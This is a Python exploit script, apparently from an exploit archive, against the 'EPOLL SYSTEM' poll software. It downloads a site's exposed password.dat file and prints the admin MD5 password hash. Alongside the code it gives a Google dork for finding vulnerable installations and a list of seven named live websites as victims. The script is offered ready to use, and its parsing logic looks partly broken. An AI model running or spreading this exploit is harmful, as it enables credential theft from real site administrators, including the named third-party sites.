#!/usr/bin/python #Portal Name: EPOLL SYSTEM #Version : All version #'Google Dork : Powered by Egorix #Exploit Coded by: Pouya_Server #Exploit Discovered by: Pouya_Server #Contact Me : Pouya.s3rver@Gmail.com #Epoll system login page = www.site.com/[Path]/admin.php import urllib import sys import parser serv="http://" i=0 for arg in sys.argv:      i=i+1 if i!=3:  print """\n\n          \tEpoll System   (password.dat)                                    \tUsage:exploit.py [targetsite] [path]           \tExample:exploit.py www.target.com /Path/           \tResult= Admin Pass [MD5]" \n\n""" else:        adres=sys.argv[1]     path=sys.argv[2]     str1=adres.join([serv,path])     str2=str1.join(['','/password.dat'])     print "\n[~]Connecting..."     url=urllib.urlopen(str2).read();     print "\n[+]Connected!"       test=url.find(path);     t=0;     print "\n\t\t\t-=[Admin Password]=-"     while(url[test+1]!=1): # Pouya               print url[test],               if(url[test]=='\n'):                  t=t+1;               if(t==2):                  break;                              test=test+1;     print "\n\n\t\t\t[ Coded by Pouya_Server ]"   ------------------------------------------------------------------------------------------ Victem : http://www.domivka.net/poll http://asadullin.ru/vote http://www.svatovo.ws/poll http://www.xk3.ru/vote http://kudrev.oblhospital.com.ua/vote2 http://www.most-tv.ru/pool http://www.srkc.ru